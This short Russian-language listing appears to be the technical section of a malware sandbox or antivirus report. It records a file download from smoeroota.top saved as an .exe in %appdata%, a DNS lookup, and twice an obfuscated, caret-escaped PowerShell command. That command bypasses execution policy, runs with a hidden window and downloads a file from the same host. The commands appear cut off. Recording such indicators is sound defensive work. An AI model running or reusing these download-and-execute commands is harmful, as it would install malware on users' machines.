Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^We^rshe^l^l.ExE -E^x^E^cU^t^IO^nP^oLI^cY B^yP^a^sS -NoP^R^OFile -^WI^nDOw^S^ty^l^e ^HIddE^N^ ^(ne^w-oBJeCT^ SYStE^M.Net.w^Eb^cl^i^eNT).dOwN^LOaD^fILE(^'http://smoeroota.top/rea...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "PO^We^rshe^l^l.ExE -E^x^E^cU^t^IO^nP^oLI^cY B^yP^a^sS -NoP^R^OFile -^WI^nDOw^S^ty^l^e ^HIddE^N^ ^(ne^w-oBJeCT^ SYStE^M.Net.w^Eb^cl^i^eNT).dOwN^LOaD^fILE(^'http://smoeroota.top/rea...' (со скрытым окном)